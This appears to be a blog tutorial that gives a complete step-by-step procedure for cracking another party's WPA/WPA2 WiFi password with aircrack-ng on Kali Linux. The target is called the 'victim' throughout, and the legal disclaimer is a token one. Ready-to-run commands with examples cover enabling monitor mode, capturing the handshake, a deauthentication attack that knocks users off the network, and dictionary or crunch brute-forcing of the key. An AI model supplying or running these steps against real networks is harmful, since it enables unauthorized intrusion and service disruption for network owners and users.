Searching for a method to crack WiFi WPA? Then this article is for you. Hacking is one of the most popular terms among teenagers. Nowadays people are genuinely interested in penetration testing. If you have an interest in ethical hacking, or you can say penetration testing, you can earn a lot. In this post I will describe how to crack WiFi WPA; after reading the complete tutorial you will feel amazing WiFi cracking power in your hands! We are using Kali Linux, a penetration testing OS.
- What is Kali Linux, basics of Kali Linux penetration testing.
- Where to start learning hacking. (How to become an ethical hacker)
Note: This tutorial is for learning purposes only; TechXpertz will not be responsible if the tutorial is used for criminal purposes.
Let's start: crack WiFi WPA
What we are going to do is:
So, the penetration testing process is going to be:
- First of all, we will start our pentest by collecting packets from our victim's WiFi.
- If the user is connected to the WiFi, we will perform a deauth attack (thereby disconnecting users from the WiFi router).
- When we turn off our deauth attack, the victim's phone/laptop will try to connect again. As the device authenticates with the router, we will get the handshake, because authentication requires the key. But the key is in encrypted form.
- Finally, we have the key in encrypted form. We will now perform a dictionary attack on the encrypted key, and when the key matches, we will get the password.
What is a WPA/WPA2 WiFi network?
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are the latest security protocols used by routers to secure WiFi networks. I am not going into detail; you can just google it for the geeky theory.
Let's start cracking WPA/WPA2, I mean pentesting:
- Fire up a terminal and start the wireless interface in monitor mode.
Command: airmon-ng start wlan0
Notice that airmon-ng enabled monitor-mode on wlan0mon.
So, the correct interface name to use in later parts of the tutorial is wlan0mon.
- Have a look at the packets passing through the air.
Command: airodump-ng wlan0mon
As a result, all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.
Copy the BSSID and channel of the victim.
Command: airodump-ng -c "victim's channel" --bssid "victim's bssid" -w "file name" wlan0mon
Example: airodump-ng -c 1 --bssid 90:8D:78:0F:3B:0F -w Wireless wlan0mon
- -c : The channel for the wireless network.
- --bssid : The MAC address of the access point.
- -w : The file name prefix for the file which will contain the authentication handshake.
- wlan0mon : The wireless interface.
Finally, wait 2 minutes. If you successfully captured the handshake, skip step 3.
- Since we do not have the handshake yet, we will use aireplay-ng to deauth the victim. When the device reconnects, we will get the handshake.
Command: aireplay-ng -0 0 -a "BSSID of victim" wlan0mon
Example: aireplay-ng -0 0 -a 90:8D:78:0F:3B:0F wlan0mon
- As a result we have the handshake; we will now attack it using aircrack-ng.
Command: aircrack-ng -w "dictionary's location" -b "victim's bssid" "handshake (.cap) file"
Example: aircrack-ng -w wordlist.dic -b 90:8D:78:0F:3B:0F WPAcrack.cap
4. (Alternative) Rather than a dictionary, we can pipe crunch into aircrack-ng.
Command: crunch "length" options | aircrack-ng -w - -b "victim's BSSID" "HANDSHAKE_FILE"